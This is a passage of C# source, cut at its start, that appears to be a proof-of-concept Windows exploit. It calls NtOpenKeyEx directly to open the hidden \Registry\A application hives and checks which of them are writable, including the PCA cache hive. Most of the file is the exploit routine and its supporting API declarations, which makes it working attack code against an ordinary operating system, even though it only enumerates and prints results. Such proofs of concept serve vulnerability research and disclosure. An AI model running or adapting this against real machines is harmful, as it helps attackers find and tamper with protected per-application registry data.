IgnoreInserts = 0x00000200
}
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern int FormatMessage(
FormatFlags dwFlags,
IntPtr lpSource,
int dwMessageId,
int dwLanguageId,
out IntPtr lpBuffer,
int nSize,
IntPtr Arguments
);
[DllImport("kernel32.dll")]
private static extern IntPtr LocalFree(IntPtr p);
private static string StatusToString(int status)
{
IntPtr buffer = IntPtr.Zero;
try
{
if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts,
GetModuleHandle("ntdll.dll"), status, 0, out buffer, 0, IntPtr.Zero) > 0)
{
return Marshal.PtrToStringUni(buffer);
}
}
finally
{
if (buffer != IntPtr.Zero)
{
LocalFree(buffer);
}
}
return String.Format("Unknown Error: 0x{0:X08}", status);
}
public NtException(int status) : base(StatusToString(status))
{
}
}
static void StatusToNtException(int status)
{
if (status < 0)
{
throw new NtException(status);
}
}
[DllImport("ntdll.dll")]
static extern int NtOpenKeyEx(
out SafeRegistryHandle KeyHandle,
GenericAccessRights DesiredAccess,
[In] ObjectAttributes ObjectAttributes,
int OpenOptions
);
[DllImport("ntdll.dll")]
static extern int NtClose(IntPtr handle);
static RegistryKey OpenKey(RegistryKey base_key, string path, bool writable = false, bool throw_on_error = true)
{
IntPtr root_key = base_key != null ? base_key.Handle.DangerousGetHandle() : IntPtr.Zero;
using (ObjectAttributes KeyName = new ObjectAttributes(path, AttributeFlags.CaseInsensitive | AttributeFlags.OpenLink, root_key))
{
SafeRegistryHandle keyHandle;
GenericAccessRights desired_access = GenericAccessRights.GenericRead;
if (writable)
{
desired_access |= GenericAccessRights.GenericWrite;
}
int status = NtOpenKeyEx(out keyHandle, desired_access, KeyName, 0);
if (throw_on_error)
{
StatusToNtException(status);
}
if (status == 0)
return RegistryKey.FromHandle(keyHandle);
return null;
}
}
static void DoExploit()
{
RegistryKey root_key = OpenKey(null, @"\Registry");
RegistryKey attach_key = root_key.OpenSubKey("A");
foreach (string key_name in attach_key.GetSubKeyNames())
{
bool writable = true;
RegistryKey app_key = OpenKey(attach_key, key_name, true, false);
if (app_key == null)
{
writable = false;
app_key = OpenKey(attach_key, key_name, false, false);
}
if (app_key != null)
{
Console.WriteLine(@"Found {0} Key \Registry\A\{1}", writable ? "Writable" : "Readable", key_name);
RegistryKey sub_key = app_key.OpenSubKey(@"Root\Programs");
if (sub_key != null)
{
Console.WriteLine("{0} is the PCA Cache Hive", key_name);
sub_key.Close();
}
app_key.Close();
}
}
}
static void Main(string[] args)
{
try
{
DoExploit();
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
}
}
}